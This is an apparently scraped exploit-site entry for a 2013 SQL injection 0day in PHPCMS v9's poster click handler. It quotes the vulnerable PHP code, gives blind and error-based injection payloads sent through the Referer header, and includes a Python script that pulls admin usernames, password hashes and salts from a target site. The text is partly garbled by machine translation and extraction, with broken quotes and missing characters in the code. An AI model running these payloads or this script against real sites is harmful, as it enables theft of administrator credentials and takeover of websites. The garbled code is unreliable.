phpcms post_click injection 0day exploit code-exploit warning-the black bar safety net

2013-01-10T00:00:00
ID MYHACK58:62201336653
Type myhack58
Reporter 佚名
Modified 2013-01-10T00:00:00

Description

Someone released a phpcmsv9 of 0day,feel free to write one using the code,wherein the injected code has two forms:

问题 函数 \phpcms\modules\poster\index.php

public function poster_click() { $id = isset($_GET['id']) ? intval($_GET['id']) : 0; $r = $this->db->get_one(array('id'=>$id)); if (! is_array($r) && empty($r)) return false; $ip_area = pc_base::load_sys_class('ip_area'); $ip = ip(); $area = $ip_area->get($ip); $username = param::get_cookie('username') ? param::get_cookie('username') : "; if($id) { $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid(); $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'= > HTTP_REFERER, 'clicktime'= > SYS_TIME, 'type'=> 1)); } $this->db->update(array('clicks'=>'+=1'), array('id'=>$id)); $setting = string2array($r['setting']); if (count($setting)==1) { $url = $setting['1']['linkurl']; } else { $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl']; } header('Location: '.$ url); }

Use way:

1, You can use blind injection methods:

referer:1',(select password from v9_admin where userid=1 and substr(password,4)='xxoo'),'1')#

By returning the page properly or not is a personal guess to decrypt the codeword segment.

2, The code is spent opening and write, readily attach:

1',(SELECT 1 FROM (select count(),concat(floor(rand(0)2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema. tables group by a)b),'1')#

This method is a burst error injection techniques, principles of self-examination.

The use of the program:

!/ usr/bin/env python

import httplib,sys,re

def attack(): print “Code by Pax. The Mac Team conqu3r!” print “Welcome to our zone!!!” url=sys. argv[1] paths=sys. argv[2] conn = httplib. HTTPConnection(url) i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/2 0 0 9 0 6 2 4 Firefox/3.5", “Accept”: “text/plain”, "Referer": "1',(SELECT 1 FROM (select count(),concat(floor(rand(0)2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema. tables group by a)b),'1')#"} conn. request(“GET”, paths+”/index. php? m=poster&c=index&a=poster_click&sitespaceid=1&id=2", headers = i_headers) r1 = conn. getresponse() datas=r1. read() datas=re. findall(r”Duplicate entry \’\w+’”, datas) print datas[0] conn. close() if name==”main”: if len(sys. argv)<3: print “Code by Pax. The Mac Team conqu3r” print “Usgae:” print “ phpcmsattack.py www.paxmac.org /” print “ phpcmsataack.py www.paxmac.org /phpcmsv9/” sys. exit(1) attack()